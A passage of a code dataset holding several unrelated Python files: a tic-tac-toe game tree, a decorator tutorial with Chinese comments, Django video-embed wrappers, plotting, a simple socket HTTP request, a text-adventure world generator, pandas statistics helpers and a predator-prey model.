len(set(line2)) == 1 and not '' in line2:\n\t\t\treturn self.grid[0][2]\n\n\tdef __getTests__(self):\n\t\treturn [self.__test_horizontal_win__(), self.__test_vertical_win__(), self.__test_diagonal_win__()]\n\t\t\t\n\tdef __print__(self):\n\t\tprint(\"[{}\\n {}\\n {}] = {}, {}, {}\\n\".format(fp(self.grid[0]), fp(self.grid[1]), fp(self.grid[2]), self.tipo(), self.__getTests__(), self.depth))\n\t\n\tdef __init__(self, griglia, depth = 0):\n\t\tself.grid = griglia\n\t\tself.projections = [] # lista di NodoTris\n\t\tself.__assertGridDetails__()\n\t\tself.depth = depth\n\t\t\t\n\t\t# self.__print__()\n\t\tif self.tipo() == '?':\n\t\t\tfor ri, row in enumerate(self.grid):\n\t\t\t\tfor ci, cell in enumerate(row):\n\t\t\t\t\tif cell == '':\n\t\t\t\t\t\tnewgrid = deepcopy(griglia)\n\t\t\t\t\t\tnewgrid[ri][ci] = self.current_player\n\t\t\t\t\t\tself.projections += [NodoTris(newgrid, depth + 1)]\n\t\t\n\t#nonR \n\tdef tipo(self):\n\t\t# o, x, ?, - : winO, winX, ???, tie\n\t\ttests = self.__getTests__()\n\t\tif set(tests) == {None}:\n\t\t\treturn ['-', '?'][int(self.isIncomplete)]\n\t\telse:\n\t\t\treturn ['o', 'x'][int('x' in tests)]\n\t\t\n\t#R\n\tdef esiti(self):\n\t\towins, xwins, ties = 0, 0, 0\n\t\ttype = self.tipo()\n\t\towins += int(type == 'o')\n\t\txwins += int(type == 'x')\n\t\tties += int(type == '-')\n\t\t\n\t\tfor p in self.projections:\n\t\t\tproj_r = p.esiti()\n\t\t\tties += proj_r[0]\n\t\t\towins += proj_r[1]\n\t\t\txwins += proj_r[2]\n\t\t\n\t\treturn ties, owins, xwins\n\t\n\t\n\tdef __getAll__(self):\n\t\tproj = [] \n\t\tproj += self.projections\n\t\tfor p in self.projections:\n\t\t\tproj += p.__getAll__()\n\t\treturn proj\n\t\n\t#R\n\tdef vittorie_livello(self, giocatore, h):\n\t\t# quante vittorie per (['o','x']) al livello (int) ?\n\t\tprojections = self.__getAll__()\n\t\treturn len([p for p in self.__getAll__() if p.depth == h and p.tipo() == giocatore])\n\t\n\tdef __find_best_move__(self, plr):\n\t\tpaths = [path for path in self.__getAll__() if path.tipo() == plr]\n\t\tif paths:\n\t\t\tbest = paths[0]\n\t\t\tfor path in paths:\n\t\t\t\tif path.depth < best.depth:\n\t\t\t\t\tbest = path\n\t\t\treturn best\n\t\n\t#R\n\tdef strategia_vincente(self, giocatore):\n\t\tprint(giocatore, self.current_player, self.current_player is giocatore)\n\t\tif self.projections:\n\t\t\tif self.current_player is not giocatore:\n\t\t\t\t# loss_paths = [proj for proj in self.projections if proj.tipo() in ['?', other(giocatore)]]\n\t\t\t\tcertain_loss_paths = [proj for proj in self.projections 
if proj.tipo() == other(giocatore)]\n\t\t\t\t\n\t\t\t\tif certain_loss_paths:\n\t\t\t\t\tprint(\"---\")\n\t\t\t\t\treturn False\n\t\t\t\telse:\n\t\t\t\t\tbest = self.__find_best_move__(self.current_player)\n\t\t\t\t\tworst = self.__find_best_move__(other(self.current_player))\n\t\t\t\t\treturn best.strategia_vincente(other(giocatore))\n\t\t\t\t\t# print(\"shortest loss is: \")\n\t\t\t\t\t# best.__print__()\n\t\t\t\t\t# print(\"shortest win is: \")\n\t\t\t\t\t# worst.__print__()\n\t\t\t\t#elif loss_paths:\n\t\t\t\t#\tfor path in loss_paths:\n\t\t\t\t#\t\tpath.__print__()\n\t\t\t\t#\t\treturn path.strategia_vincente(giocatore)\n\t\t\telse:\n\t\t\t\t# victory_paths = [proj for proj in self.projections if proj.tipo() in ['?', giocatore]]\n\t\t\t\tcertain_victory_paths = [proj for proj in self.projections if proj.tipo() == giocatore]\n\t\t\t\tif certain_victory_paths:\n\t\t\t\t\tprint(\"---\")\n\t\t\t\t\treturn True\n\t\t\t\telse:\n\t\t\t\t\tbest = self.__find_best_move__(self.current_player)\n\t\t\t\t\tworst = self.__find_best_move__(other(self.current_player))\n\t\t\t\t\treturn worst.strategia_vincente(giocatore)\n\t\t\t\t\t# print(\"shortest win is: \")\n\t\t\t\t\t# best.__print__()\n\t\t\t\t\t# print(\"shortest loss is: \")\n\t\t\t\t\t# worst.__print__()\n\t\t\t\t# elif victory_paths:\n\t\t\t\t#\tfor path in victory_paths:\n\t\t\t\t#\t\tpath.__print__()\n\t\t\t\t#\t\treturn path.strategia_vincente(giocatore)\n\t\telse:\n\t\t\treturn self.tipo() == giocatore\n#R\t\t\ndef gen_tree(griglia):\n\t# griglia è una configurazione di gioco\n\treturn NodoTris(griglia)\n\t\n#x = gen_tree(g0)\n#print(\"generated: \", len(x.__getAll__()))\n#for n in range(10):\n#\tprint(x.vittorie_livello('o', n)) # print(\"l{}: {}\".format(n, x.vittorie_livello('o', n)))","sub_path":"students/1749703/homework04/program02.py","file_name":"program02.py","file_ext":"py","file_size_in_byte":10340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"614147126","text":"'''\n装饰器的进阶\n 1 functools.warps\n 2 带参数的装饰器\n 3 多个装饰装饰同一个函数\n\n装饰器的本质 : 闭包函数\n\n'''\n\n#装饰器作业三次登录\n\n# def login_check(f):\n# def inner(**kwargs):\n# count=0\n# while count<=3:\n# res=f(**kwargs)\n# if res==True:\n# print('login ok')\n# else:\n# print('login not ok')\n# count+=1\n# return inner\n#\n#\n# @login_check\n# def login_test(**kwargs):\n# if kwargs['username']=='yuan' and kwargs['username']:\n# if kwargs['pwd']=='nihao':\n# print('login success')\n# return True\n# else:\n# return False\n#\n# login_test(username='yuan',pwd='nihao')\n\n\n# 进阶版\nfrom functools import wraps\n# def login_check(f):\n# def inner(*args,**kwargs):\n# res=f(*args,**kwargs)\n# username=res[1]['username']\n# pwd=res[1]['pwd']\n# print('pwd',pwd)\n# with open('loginword',encoding='utf-8')as f1:\n# for i in f1:\n# print(i)\n# if username in i:\n# if i.split(\" \")[1].strip()==pwd:\n# print('login pass')\n# return True\n# else:\n# print('请输入正确密码')\n# return False\n# return inner\n#\n#\n# @login_check\n# def login(*args,**kwargs):\n# print(args,kwargs)\n# return args,kwargs\n#\n#\n# login(username='yuanbao',pwd='hanqing')\n\n\n# 为什么 装饰器函数要 加 *打散\nfrom functools import wraps\n# def outer(*args):\n# '''\n# 函数注释\n# .__doc__\n# :param args:\n# :return:\n# '''\n# print(args)\n# print(*args)\n#\n# def inner(*args):\n# print('inner>>',args)\n# inner(args)\n#\n# outer(1,2,3,4)\n# print(outer.__name__)#查看字符串格式的函数名\n# print(outer.__doc__)#查看函数的注释\n\n\n# from functools import wraps\n# def login_check(f):\n# # functools中提供的装饰器 
如果不加则实际在调用被装饰函数的时候\n# #调用的是装饰器内的闭包函数,这一点可以只用.__name__方法验证\n# #但是如果加了 就是不会影响原函数\n# @wraps(f)\n# def inner(*args,**kwargs):\n# res=f(*args,**kwargs)\n# username=res[1]['username']\n# pwd=res[1]['pwd']\n# print('pwd',pwd)\n# with open('loginword',encoding='utf-8')as f1:\n# for i in f1:\n# print(i)\n# if username in i:\n# if i.split(\" \")[1].strip()==pwd:\n# print('login pass')\n# return True\n# else:\n# print('请输入正确密码')\n# return False\n# return inner\n#\n#\n# @login_check\n# def login(*args,**kwargs):\n# print(args,kwargs)\n# return args,kwargs\n#\n# login(username='yuanbao',pwd='hanqing')\n# print(login.__name__)\n\n\n\n'''\n带参数的装饰器 \n 本质是 装饰器又封装了一层外部函数 将flage穿进去 装饰器最多三层\n 并没有改变装饰器的原来的调用方式\n\n'''\n\nimport time\n# FlAGE=1\n# def timer_out(flag):\n# def timer(func):\n# def inner(*args,**kwargs):\n# if flag:\n# start=time.time()\n# ret=func(*args,**kwargs)\n# end=time.time()\n# print(end-start)\n# return ret\n# else:\n# ret=func(*args,**kwargs)\n# print('没有执行装饰器')\n# return ret\n# return inner\n# return timer\n\n\n#以下两句基本相等\n# timer=timer_out(FlAGE)\n# @timer\n# @timer_out(FlAGE)\n# def wahah():\n# time.sleep(0.1)\n# print('wahah')\n#\n#\n# wahah()\n\n'''\n多个装饰器装饰一个函数\n书:python核心编程\n\n如果有多个装饰器 那么就先执行最近的那个装饰器\n'''\n\n# def warper1(f):\n# def inner1():\n# print('start warper1')\n# res=f()\n# print('end inner1')\n# return res\n# return inner1\n#\n# def warper2(f):\n# def inner2():\n# print('start warper2')\n# res=f()\n# print('end inner2')\n# return res\n# return inner2\n#\n# def warper3(f):\n# def inner3():\n# print('start warper3')\n# res=f()\n# print('end inner3')\n# return res\n# return inner3\n# @warper3 #f=warper(f)>>>>waper3(inner2)==inner3\n# @warper2 #f=warper(f)>>>>waper2(inner1)==inner2\n# @warper1 #f=warper1(f)=inner1 最先执行\n# def func_01():\n# print(\"func_01\")\n# return '多层装饰器'\n#\n# func_01()\n\n\n#思考 如果同时使用2个装饰器 记录用户的登录情况 和 函数执行时间的先后顺序\nimport time\ndef login_time(f):\n def inner(*args,**kwargs):\n start=time.time()\n time.sleep(0.1)\n res=f(*args,**kwargs)\n end=time.time()\n print(end-start)\n return res\n return inner\n\ndef login_status(f):\n def inner(*args,**kwargs):\n print('判断登录状态')\n print(args,kwargs)\n result=f(*args,**kwargs)\n username=result[1]['name']\n pwd=result[1]['pwd']\n with open('loginword',encoding='utf-8')as f1:\n for i in f1:\n if username in i:\n listuser=i.strip().split()\n if username==listuser[0] and pwd==listuser[1]:\n print('login pass')\n return True\n else:\n print('请检查密码')\n return False\n\n return inner\n\n\n@login_time\n@login_status\ndef login(*args,**kwargs):\n print(\"login\",args,kwargs)\n return args,kwargs\n\nresult=login(name='yuan',pwd='nihao')\nprint(\"result\",result)","sub_path":"day12/day12a.py","file_name":"day12a.py","file_ext":"py","file_size_in_byte":5895,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"273106152","text":"n = int(input(\"Enter no of rows = \"))\n\nfor row in range(1,n+1) :\n for col in range(1,n-row+2) :\n print(\"*\",end='')\n print()\n\nrow = 1 \nwhile row <= n :\n col = 1\n while col <= n-row+1:\n print(\"*\",end='')\n col += 1\n print()\n row += 1\n","sub_path":"Basic Python/pat2.py","file_name":"pat2.py","file_ext":"py","file_size_in_byte":270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"613040456","text":"import re\nfrom django.template.loader import render_to_string\nfrom django.conf import settings\nfrom registry import wrappers\n\n\n\nclass YoutubeWrapper(object):\n re_urls = (\n 
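The day12a.py record above works through stacking several decorators on one function; the rule it illustrates is that decorators are applied bottom-up but executed top-down. A self-contained sketch of that ordering (all names hypothetical):

    def make_wrapper(tag):
        def decorator(func):
            def inner(*args, **kwargs):
                print('enter', tag)
                result = func(*args, **kwargs)
                print('exit', tag)
                return result
            return inner
        return decorator

    @make_wrapper('w3')  # applied last, so it runs first
    @make_wrapper('w2')
    @make_wrapper('w1')  # applied first, so it runs closest to the function
    def greet():
        print('greet body')

    greet()
    # prints: enter w3, enter w2, enter w1, greet body, exit w1, exit w2, exit w3

This is also why, in the login example of that record, the timing decorator placed on top measures the whole login-status check rather than only the bare function.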
re.compile(r'http(s)?://(www.)?youtube.com/watch\\?v=(?P<id>[^&]+).*$'),\n re.compile(r'http(s)?://(www.)?youtu.be/(?P<id>.+)'),\n )\n\n def match_url(self, url):\n return bool(self.clean_url(url))\n\n def clean_url(self, url):\n for pattern in self.re_urls:\n match = pattern.match(url)\n if match:\n return 'http://www.youtube.com/embed/%(id)s' % match.groupdict()\n return None\n\n def render(self, url, opts=None):\n ctx = {}\n ctx.update(opts or {})\n ctx.update({\n 'url': self.clean_url(url),\n 'MEDIA_URL': settings.MEDIA_URL,\n })\n\n return render_to_string('videoembed/embed_youtube.html', ctx)\n\n\nclass FlowplayerWrapper(object):\n def match_url(self, url):\n return url.endswith('.flv')\n\n def render(self, url, opts=None):\n ctx = {}\n ctx.update(opts or {})\n ctx.update({\n 'url': url,\n 'MEDIA_URL': settings.MEDIA_URL,\n })\n\n return render_to_string('videoembed/embed_flowplayer.html', ctx)\n\n\nclass VimeoWrapper(object):\n re_urls = (\n re.compile(r\"^http(s)?://(www.)?vimeo.com/(?P<id>\\d+)\"),\n )\n\n def match_url(self, url):\n return bool(self.clean_url(url))\n\n def clean_url(self, url):\n for pattern in self.re_urls:\n match = pattern.match(url)\n if match:\n return 'http://player.vimeo.com/video/%(id)s' % match.groupdict()\n return None\n\n def render(self, url, opts=None):\n ctx = {}\n ctx.update(opts or {})\n ctx.update({\n 'url': self.clean_url(url),\n 'MEDIA_URL': settings.MEDIA_URL,\n })\n\n return render_to_string('videoembed/embed_vimeo.html', ctx)\n\n\ndef register_default_wrappers():\n wrappers.register(YoutubeWrapper)\n wrappers.register(FlowplayerWrapper)\n wrappers.register(VimeoWrapper)\n","sub_path":"videoembed/default_wrappers.py","file_name":"default_wrappers.py","file_ext":"py","file_size_in_byte":2117,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"84018229","text":"import pandas as pd\nimport matplotlib.pyplot as plt\ndf = pd.read_csv('sales_data.csv')\nfacecream=df['facecream'].values\nfacewash=df['facewash'].values\ntoothpaste=df['toothpaste'].values\nbathingsoap=df['bathingsoap'].values\nshampoo=df['shampoo'].values\nmoisturizer=df['moisturizer'].values\nmonth_number=df['month_number'].values\nplt.figure()\nplt.plot(month_number,facecream,label='facecream',marker='o',linewidth=3)\nplt.plot(month_number,facewash,label='facewash',marker='o',linewidth=3)\nplt.plot(month_number,toothpaste,label='toothpaste',marker='o',linewidth=3)\nplt.plot(month_number,bathingsoap,label='bathingsoap',marker='o',linewidth=3)\nplt.plot(month_number,shampoo,label='shampoo',marker='o',linewidth=3)\nplt.plot(month_number,moisturizer,label='moisturizer',marker='o',linewidth=3)\nplt.xlabel('month number')\nplt.ylabel('products')\nplt.legend(loc='upper left')\nplt.xticks(month_number)\nplt.yticks([1e3,2e3,4e3,6e3,8e3,10e3,12e3,15e3,18e3])\nplt.grid(True,linewidth=0.5,linestyle='--')\nplt.title('company product')\nplt.savefig('sales_data_of_bathing_soap.png',dpi=150)\nplt.show()\n","sub_path":"lab2/set4/esercizio3.py","file_name":"esercizio3.py","file_ext":"py","file_size_in_byte":1085,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"63121439","text":"import socket\n\nhost = 'www.google.com'\nport = 80\nsize = 1024\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.connect((host,port))\nfile1stringcontent=\"GET / HTTP/1.1\\r\"\nfile1asciicontent = file1stringcontent.encode('ascii')\ns.send(file1asciicontent)\ndata = s.recv(size)\ns.close()\ndatastringcontent = 
data.decode('ascii')\nprint ('Received: '+ datastringcontent)","sub_path":"eclipse_workspace/DataCommAssignment1/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"244510928","text":"import random\nfrom MapTiles import *\n\nclass WorldClass(object):\n\t\"\"\"\n\tA world object to store the game tiles and the player's position\n\t\n\tVariables:\n\t\ttile_count (int)\n\t\tplayer (Player object)\n\t\tstarting_position ((x, y) tuple of ints)\n\t\tworldDictionary {(x, y): MapTile object}\n\t\tfillTiles [tile-name strings]\n\t\tpossibleTilesSet {tile-name strings}\n\n\tMethods:\n\t\tgenerate_world() Used to generate the tiles if a new tile needs to be generated\n\t\tgame_over_room() Sets the player to the GameOverRoom game tile\n\t\tpick_new_tile() Used to add a tile to the fillTiles list\n\t\thow_many_tile() Returns variable tile_count\n\t\ttile_exists() Returns the tile for a given x,y coordinate\n\t\"\"\"\n\tdef __init__(self, player):\n\n\t\t# Used to keep track of how many tiles have been placed for adding new tiles and difficulty\n\t\tself.tile_count = 1\n\n\t\tself.player = player\n\n\t\t# A tuple holding the x,y grid coordinates\n\t\tself.starting_position = (0,0)\n\n\t\t# A dictionary to hold the maptiles making up the world\n\t\t# An (x, y) tuple is the key representing the location\n\t\t# and the value is the tile object\n\t\tself.worldDictionary = {}\n\n\t\t# This starts the world dictionary with the StartingRoom tile and coordinates 0,0\n\t\tself.worldDictionary[(0, 0)] = StartingRoom(0,0, self.player)\n\n\t\t# A List which holds all of the tiles which can be \n\t\t# pulled from while generating the world\n\t\tself.fillTiles = []\n\n\t\t# Originally populating the fillTiles\n\t\tself.fillTiles.extend([\"Find5GoldRoom\"]*8)\n\t\tself.fillTiles.extend([\"EmptyCavePath\"]*8)\n\n\t\tself.fillTiles.extend([\"BanditRoom\"]*8)\n\t\tself.fillTiles.extend([\"GiantSpiderRoom\"]*6)\n\t\tself.fillTiles.extend([\"ValkyrieRoom\"]*4)\n\t\tself.fillTiles.extend([\"OgreRoom\"]*2)\n\t\tself.fillTiles.extend([\"AssassinRoom\"]*1)\n\t\tself.fillTiles.extend([\"DeathKnightRoom\"]*0)\n\t\tself.fillTiles.extend([\"GiantRoom\"]*0)\n\t\tself.fillTiles.extend([\"GreenDragonRoom\"]*0)\n\t\tself.fillTiles.extend([\"WizardRoom\"]*0)\n\t\t\n\t\tself.fillTiles.extend([\"FindDaggerRoom\"]*2)\n\t\tself.fillTiles.extend([\"FindShortSwordRoom\"]*2)\n\t\tself.fillTiles.extend([\"FindQuarterStaffRoom\"]*2)\n\t\tself.fillTiles.extend([\"FindLongSwordRoom\"]*2)\n\t\tself.fillTiles.extend([\"FindBattleAxeRoom\"]*2)\n\n\t\tself.fillTiles.extend([\"FindPaddedClothRoom\"]*2)\n\t\tself.fillTiles.extend([\"FindStuddedLeatherRoom\"]*2)\n\t\tself.fillTiles.extend([\"FindChainShirtRoom\"]*2)\n\t\tself.fillTiles.extend([\"FindRingMailRoom\"]*2)\n\t\tself.fillTiles.extend([\"FindFullPlateRoom\"]*2)\n\n\n\t\tself.fillTiles.extend([\"HealRoomWeak\"]*1)\n\t\tself.fillTiles.extend([\"HealRoomMedium\"]*1)\n\t\tself.fillTiles.extend([\"HealRoomStrong\"]*1)\n\t\tself.fillTiles.extend([\"HealRoomSuperior\"]*1)\n\t\tself.fillTiles.extend([\"HealRoomExtreme\"]*0)\n\n\n\n\t\t# Used to fill in to fillTiles when fillTiles pops\n\t\tself.possibleTilesSet = {\"Find5GoldRoom\", \"EmptyCavePath\",\\\n\t\t\t\t\t\t\t\t \"BanditRoom\", \"GiantSpiderRoom\", \"ValkyrieRoom\",\\\n\t\t\t\t\t\t\t\t \"OgreRoom\", \"AssassinRoom\", \"DeathKnightRoom\",\\\n\t\t\t\t\t\t\t\t \"GiantRoom\", \"GreenDragonRoom\", \"WizardRoom\",\\\n\t\t\t\t\t\t\t\t \"FindShortSwordRoom\", \"FindDaggerRoom\", 
\"FindQuarterStaffRoom\",\\\n\t\t\t\t\t\t\t\t \"FindLongSwordRoom\", \"FindBattleAxeRoom\",\\\n\t\t\t\t\t\t\t\t \"FindPaddedClothRoom\", \"FindStuddedLeatherRoom\",\\\n\t\t\t\t\t\t\t\t \"FindMoonSwordRoom\",\\\n\t\t\t\t\t\t\t\t \"FindChainShirtRoom\", \"FindRingMailRoom\", \"FindFullPlateRoom\",\\\n\t\t\t\t\t\t\t\t \"HealRoomWeak\", \"HealRoomMedium\", \"HealRoomStrong\",\\\n\t\t\t\t\t\t\t\t \"HealRoomSuperior\", \"HealRoomExtreme\"}\n\n\n\n\n\tdef generate_world(self, x, y):\n\t\t\"\"\"\n\t\tThis is used to generate the tiles if a new tile needs to be generated\n\n\t\tInput:\n\t\t\tx (int)\n\t\t\ty (int)\n\n\t\tOutput:\n\t\t\tadds the key (x,y) to the _world dictionary with the tile object as the value\n\t\t\"\"\"\n\t\tif self.tile_exists(x, y):\n\t\t\tpass\n\n\t\telse:\n\t\t\tself.worldDictionary[(x, y)] = getattr(__import__('MapTiles'), self.pick_new_tile()) (x,y, self.player)\n\n\n\tdef game_over_room(self, x, y):\n\t\t\"\"\"\n\t\tSets the player to the GameOverRoom game tile\n\n\t\tInput:\n\t\t\tx (int)\n\t\t\ty (int)\n\t\t\"\"\"\n\t\tself.worldDictionary[(x, y)] = GameOverRoom(x,y, self.player)\n\n\n\tdef pick_new_tile(self):\n\t\t\"\"\"\n\t\tThis picks a random tile from the fillTiles list\n\t\tIt also adds a new element to the list from the set of all possible tiles so it can go on forever\n\t\tTBD: add new tiles to the list at certain increments in a different function\n\t\tTBD: have a list of harder enemies in order, and once the dictionary runs out of a key\n\t\t Add the new harder enemy with a value of like 5 to start taking from\n\t\t Once the list of harder enemies is empty recreate it with a higher difficulty\n\t\t\n\t\tOutput:\n\t\t\tnew_tile_name (string)\n\t\t\"\"\"\n\t\trandom.shuffle(self.fillTiles)\n\t\tnew_tile_name = self.fillTiles.pop()\n\t\tadd_to_list = list(self.possibleTilesSet)\n\t\trandom.shuffle(add_to_list)\n\n\t\tself.fillTiles.append(add_to_list[0])\n\n\t\tself.tile_count += 1\n\n\t\treturn new_tile_name\n\n\n\tdef how_many_tile(self):\n\t\t\"\"\"\n\t\tReturns variable tile_count\n\n\t\tOutput:\n\t\t\ttile_count (int)\n\t\t\"\"\"\n\t\treturn self.tile_count\n\n\n\n\n\tdef tile_exists(self, x, y):\n\t\t\"\"\"\n\t\tCheck if there is a tile at the coordinate x,y\n\n\t\tInput:\n\t\t\tx (int)\n\t\t\ty (int)\n\n\t\tOutput:\n\t\t\tthe MapTile stored at the (x, y) key, or None\n\t\t\"\"\"\n\t\treturn self.worldDictionary.get((x,y))\n","sub_path":"adventure/World.py","file_name":"World.py","file_ext":"py","file_size_in_byte":5045,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"228948846","text":"\"\"\"\n Module for fields definition and fields statistics\n\"\"\"\nfrom collections import defaultdict\nimport pickle\nfrom app import logger\nfrom app.helper import DataSetPandas, UserFilesManager\n\n\ndef fields_definition(filename, filter=None):\n \"\"\" Build a field-definition dict for a dataset file:\n string columns map to the list of their distinct values, numeric columns to their min and max\n :param filename: path of the dataset file to read\n :param filter: tuple: name of column and value for filter\n :return dict: {'Air bags': {'max': 4, 'min': 0}, 'Body': ['MPV', 'SUV', 'Sedan'],\n 'Climate control': ['Yes', 'No']}\n \"\"\"\n dataframe = DataSetPandas()\n logger.info(filename)\n dataframe.read(filename)\n\n if filter:\n dataframe.filter_set(filter)\n\n cl_names = dataframe.get_column_names()\n\n field_def = {}\n for cl_name in cl_names:\n cl_name_val = dataframe.get_column_values(cl_name)\n if isinstance(cl_name_val[0], str):\n field_def[cl_name] = 
list(set(dataframe.get_column_values(cl_name)))\n else:\n field_def[cl_name] = dict(min=min(cl_name_val), max=max(cl_name_val))\n\n return field_def\n\n\ndef fields_statistics(dataset):\n \"\"\" This function defines fields to defaultdict in dict\n to store column names, their values and count of this values in column for statistic\n :param dataset: dataset instance\n :return dict: {'Air bags': {4: 8, 0: 8}, 'Body': {'MPV': 11, 'Sedan': 7}, 'Climate control': {'Yes': 30, 'No': 19}}\n \"\"\"\n ufm = UserFilesManager(dataset.user_id)\n file_path = ufm.get_serialized_file_path(dataset.file_id) # Exchange with UserFileManager\n\n with open(file_path, 'rb') as file:\n dataframe = DataSetPandas(pickle.load(file))\n\n if dataset.included_rows:\n dataframe.dataframe = dataframe.dataframe.iloc[dataset.included_rows]\n\n cl_names = list(dataframe.get_column_names())\n\n field_def = {}\n for cl_name in cl_names:\n default_dict = defaultdict(int)\n cl_name_val = list(dataframe.get_column_values(cl_name))\n for val in cl_name_val:\n default_dict[val] += 1\n field_def[cl_name] = default_dict\n return field_def\n\n\ndef get_data_preview(dataset, number_of_rows):\n \"\"\"\n Returns dict with names of columns and first 10 or less rows\n :param dataset: dataset instance\n :param number_of_rows: number of rows to show\n :return: dict with list with names of columns and list with lists of values of rows\n \"\"\"\n ufm = UserFilesManager(dataset.user_id)\n file_path = ufm.get_serialized_file_path(dataset.file_id) # Exchange with UserFileManager\n\n with open(file_path, 'rb') as file:\n dataframe = DataSetPandas(pickle.load(file))\n\n if dataset.included_rows:\n dataframe.dataframe = dataframe.dataframe.iloc[dataset.included_rows]\n\n return {'columns': list(dataframe.get_column_names()),\n 'rows': dataframe.amount_of_rows(number_of_rows)}\n","sub_path":"car-statistics/app/services/file_data.py","file_name":"file_data.py","file_ext":"py","file_size_in_byte":2960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"166426876","text":"#!/usr/bin/python\r\n\r\nclass Prey:\r\n\r\n\tdef __init__(self, n, m, food, r, a = [], g = []):\r\n\t\tself.number = n\r\n\t\tself.mass = m\r\n\t\tself.food = food\r\n\t\tself.rate = r\r\n\t\tself.alpha = a\r\n\t\tself.gamma = g\r\n\t\t\t\r\n\t\t#number is just the number of the Prey there are\r\n\t\t#mass is how much \"energy\" or \"food\" they are worth when killed. It also relates the carrying capacity to the \"energy\" or \"food\" available to the species\r\n\t\t#rate is just the rate at which they breed. If the carrying capacity was infinite, the growth would look like exp(rate*t)\r\n\t\t#alpha[j] is a measure of how prey species j impacts the growth of the species in question. NOTE: if we declare a Prey class as prey#[i], then alpha[i] must be one (as this is how the carrying capacity makes sense in the units of food/mass)\r\n\t\t#gamma[j] measures how predator species j hunting on this species is mitigated. 
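fields_statistics in the file_data.py record above counts how often each value occurs per column with collections.defaultdict(int); the same pattern in isolation, with made-up sample values:

    from collections import defaultdict

    column_values = ['MPV', 'Sedan', 'MPV', 'MPV']  # hypothetical 'Body' column
    counts = defaultdict(int)
    for value in column_values:
        counts[value] += 1  # missing keys start at int() == 0

    assert dict(counts) == {'MPV': 3, 'Sedan': 1}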
It can allow for mutualism if it is larger than the corresponding beta in the predator class.\r\n\tdef evolve():\r\n\t\treturn 0\r\n\r\nclass Pred:\r\n\r\n\tdef __init__(self, n, m, e, dec, b = [], d = []):\r\n\t\tself.number = n\r\n\t\tself.mass = m\r\n\t\tself.efficiency = e\r\n\t\tself.decline = dec\r\n\t\tself.beta = b\r\n\t\tself.delta = d\r\n\t\t\r\n\t\t#mass and number are same ideas as for prey\r\n\t\t#efficiency is what percentage of prey's mass the predator can convert into food for itself\r\n\t\t#decline is the rate of linear decline (if it were the only species, it would decline with exp(-decline*t))\r\n\t\t#beta[j] measures how well this species kills the prey species j (this is how the predators get food)\r\n\t\t#delta[j] measures how well this species kills the predator species j (note: the delta matrix both causes predators to grow and to decline, depending on relative sizes of parameters and populations)\r\n\t\t#in theory, delta can allow for canabalism in a species - although this is always a bad idea from a standpoint of maximising populations\r\n\t\t#delta does not allow mutualism between predators - this could be introduced easily.\r\n\r\n\tdef evolve():\r\n\t\treturn 0\r\n\r\n#will return a vector with entry i being the time derivitive of prey species i (note - x is list of prey, y is list of predators)\r\ndef CLVx(x,y):\r\n\tderiv = []\r\n\tfor i in range (0, len(x)):\r\n\t\t#the part of the model which is competition between prey species for food\r\n\t\tcompetition = 0.0\r\n\t\tcapacity = x[i].food / x[i].mass\r\n\t\t\r\n\t\t\r\n\t\tfor j in range (0, len(x)):\r\n\t\t\tcompetition += x[i].alpha[j] * x[j].number\r\n\t\tbreeding = x[i].rate * x[i].number * (1 - competition/capacity)\r\n\t\r\n\t\t\r\n\t\t#this is the prey being hunter by all the predators\r\n\t\thunting = 0.0\r\n\t\tfor j in range (0,len(y)):\r\n\t\t\thunting += (y[j].beta[i] - x[i].gamma[j]) * y[j].number\r\n\t\thunting *= x[i].number\r\n\t\t\r\n\t\t\r\n\t\tderiv.append(breeding - hunting)\r\n\treturn deriv\t\r\n\r\n#will return a list with entry i being the time derivative of predator species i\t\r\ndef CLVy(x,y):\r\n\tderiv=[]\r\n\tfor i in range(0,len(y)):\r\n\t\t#natural decline of the preds\r\n\t\tdecline = y[i].number * y[i].decline\r\n\t\t\r\n\t\t#growth from killing prey\r\n\t\thunting_prey = 0.0\r\n\t\tfor j in range (0, len(x)):\r\n\t\t\thunting_prey += (y[i].efficiency / y[i].mass)*y[i].beta[j] * y[i].number * (x[j].number * x[j].mass)\r\n\t\t\r\n\t\t#both growth and decline from predator predator interaction\r\n\t\tpredpred_interaction = 0.0\r\n\t\tfor j in range (0,len(y)):\r\n\t\t\tkilling_preds = (y[i].efficiency / y[i].mass) * y[i].delta[j] * y[i].number * y[j].number * y[j].mass\r\n\t\t\tkilled_by_preds = y[i].number * y[j].number * y[j].delta[i]\r\n\t\t\t\r\n\t\t\tpredpred_interaction += killing_preds - killed_by_preds\r\n\t\t\r\n\t\tderiv.append(hunting_prey - decline + predpred_interaction)\r\n\treturn deriv\r\n\r\n\r\n#initialises 4 prey species and 2 predators, with the parameters labelled as such\r\nx=[]\r\ny=[]\r\nx1 = Prey(0.4,0.9,5.0,0.05,[1,0.05,0.02,0.15],[0.0,0.0])\r\nx2 = Prey(0.3,1.3,5.0,0.08,[0.03,1.0,0.01,0.12],[0.0,0.0])\r\nx3 = Prey(0.4,0.2,5.0,0.15,[0.0,0.0,1.0,0.27],[0.0,0.0])\r\nx4 = Prey(0.5,15.0,10.0,0.03,[0.02,0.04,0.0,1.0],[0.0,0.0])\r\n\r\ny1 = Pred(0.4,1.0,0.3,0.08,[0.01,0.05,0.0,0.03],[0.0,0.0])\r\ny2 = 
